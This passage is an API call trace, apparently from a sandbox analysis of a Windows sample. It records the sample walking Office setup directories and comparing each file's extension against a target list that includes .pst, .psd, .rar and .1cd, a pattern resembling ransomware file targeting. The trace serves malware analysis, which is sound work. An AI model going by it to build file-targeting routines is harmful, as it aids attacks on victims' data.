	[0035.050] lstrcmpiW (lpString1=".pps", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".ppsm", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pptm", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".pptx", lpString2="I.XML") returned -1
	[0035.050] lstrcmpiW (lpString1=".prn", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".ps", lpString2="XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".psb", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".psd", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".pst", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".ptx", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".pub", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".pwm", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".pxr", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".py", lpString2="XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".qt", lpString2="XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".r3d", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".raf", lpString2=".XML") returned -1
	[0035.051] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0035.051] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.052] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.052] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="Excel.en-us", cAlternateFileName="EXCEL~1.EN-")) returned 1
	[0035.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned 91
	[0035.052] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.052] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa64b3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.052] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa64b3d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelMUI.XML", cAlternateFileName="")) returned 1
	[0035.053] lstrlenW (lpString="ExcelMUI.XML") returned 12
	[0035.053] lstrlenW (lpString=".1cd") returned 4
	[0035.053] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.053] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.053] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="Groove.en-us", cAlternateFileName="GROOVE~1.EN-")) returned 1
	[0035.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned 92
	[0035.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.053] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd67f150, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd67f150, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.053] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd658ff0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0x0, dwReserved1=0x0, cFileName="GrooveMUI.XML", cAlternateFileName="GROOVE~1.XML")) returned 1
	[0035.053] lstrlenW (lpString="GrooveMUI.XML") returned 13
	[0035.053] lstrlenW (lpString=".1cd") returned 4
	[0035.053] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.053] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.053] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="InfoPath.en-us", cAlternateFileName="INFOPA~1.EN-")) returned 1
	[0035.053] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned 94
	[0035.053] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.054] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x112a3b30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.054] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf6e345a0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x112a3b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf6e345a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x4cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.XML", cAlternateFileName="INFOPA~1.XML")) returned 1
	[0035.054] lstrlenW (lpString="InfoPathMUI.XML") returned 15
	[0035.054] lstrlenW (lpString=".1cd") returned 4
	[0035.054] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.054] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.054] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe164800, ftCreationTime.dwHighDateTime=0x1cac048, ftLastAccessTime.dwLowDateTime=0x6b277670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe164800, ftLastWriteTime.dwHighDateTime=0x1cac048, nFileSizeHigh=0x0, nFileSizeLow=0x8b7b8, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="ODeploy.exe", cAlternateFileName="")) returned 1
	[0035.054] lstrlenW (lpString="ODeploy.exe") returned 11
	[0035.054] lstrlenW (lpString=".1cd") returned 4
	[0035.054] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.055] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc2600b20, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.055] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9fff00, ftCreationTime.dwHighDateTime=0x1cba028, ftLastAccessTime.dwLowDateTime=0xc2600b20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x3e9fff00, ftLastWriteTime.dwHighDateTime=0x1cba028, nFileSizeHigh=0x0, nFileSizeLow=0x3b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRANDING.DLL", cAlternateFileName="")) returned 1
	[0035.055] lstrlenW (lpString="BRANDING.DLL") returned 12
	[0035.055] lstrlenW (lpString=".1cd") returned 4
	[0035.055] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.056] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.056] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="Office32.en-us", cAlternateFileName="OFFICE~2.EN-")) returned 1
	[0035.056] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us") returned 94
	[0035.056] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.056] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19b82c30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x19b82c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.056] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc138cb0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc138cb0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x567, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32MUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0035.056] lstrlenW (lpString="Office32MUI.XML") returned 15
	[0035.056] lstrlenW (lpString=".1cd") returned 4
	[0035.057] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.057] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.057] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="Office32.WW", cAlternateFileName="")) returned 1
	[0035.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned 91
	[0035.057] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.057] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.057] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe09b760, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.XML", cAlternateFileName="OFFICE~1.XML")) returned 1
	[0035.057] lstrlenW (lpString="Office32WW.XML") returned 14
	[0035.057] lstrlenW (lpString=".1cd") returned 4
	[0035.057] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.057] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.057] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="OneNote.en-us", cAlternateFileName="ONENOT~1.EN-")) returned 1
	[0035.057] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned 93
	[0035.057] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.057] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.058] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58ed930, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc840bb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneNoteMUI.XML", cAlternateFileName="ONENOT~1.XML")) returned 1
	[0035.058] lstrlenW (lpString="OneNoteMUI.XML") returned 14
	[0035.058] lstrlenW (lpString=".1cd") returned 4
	[0035.058] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.058] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.058] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x302b0500, ftCreationTime.dwHighDateTime=0x1cba073, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x302b0500, ftLastWriteTime.dwHighDateTime=0x1cba073, nFileSizeHigh=0x0, nFileSizeLow=0x709b68, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="OSETUP.DLL", cAlternateFileName="")) returned 1
	[0035.058] lstrlenW (lpString="OSETUP.DLL") returned 10
	[0035.058] lstrlenW (lpString=".1cd") returned 4
	[0035.058] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\*", lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
	[0035.058] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x14af010, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x2095e10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2095e10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.058] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee827f20, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x14af010, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0x0, dwReserved1=0x0, cFileName="OutlookMUI.XML", cAlternateFileName="OUTLOO~1.XML")) returned 1
	[0035.058] lstrlenW (lpString="OutlookMUI.XML") returned 14
	[0035.058] lstrlenW (lpString=".1cd") returned 4
	[0035.058] FindClose (in: hFindFile=0xb430308 | out: hFindFile=0xb430308) returned 1
	[0035.059] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4bb740 | out: hHeap=0x7d60000) returned 1
	[0035.059] FindNextFileW (in: hFindFile=0xb4302c8, lpFindFileData=0xaa5f094 | out: lpFindFileData=0xaa5f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb169e000, ftCreationTime.dwHighDateTime=0x1ca911f, ftLastAccessTime.dwLowDateTime=0x6cee1d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb169e000, ftLastWriteTime.dwHighDateTime=0x1ca911f, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0xaa5f1f4, cFileName="pidgenx.dll", cAlternateFileName="")) returned 1
	[0035.059] lstrlenW (lpString="pidgenx.dll") returned 11
	[0035.059] lstrlenW (lpString=".1cd") returned 4
	[0035.062] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b7fe90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5b7fe90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0035.062] FindNextFileW (in: hFindFile=0xb430308, lpFindFileData=0xaa5ee18 | out: lpFindFileData=0xaa5ee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4e37e00, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5b7fe90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4e37e00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof.XML", cAlternateFileName="")) returned 1
	[0035.062] lstrlenW (lpString="Proof.XML") returned 9
	[0035.062] lstrlenW (lpString=".1cd") returned 4
	[0043.582] FindFirstFileW (in: lpFileName="C:\\Program Files\\Windows Mail\\en-US\\*", lpFindFileData=0xaa5f58c | out: lpFindFileData=0xaa5f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ecb743, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430308
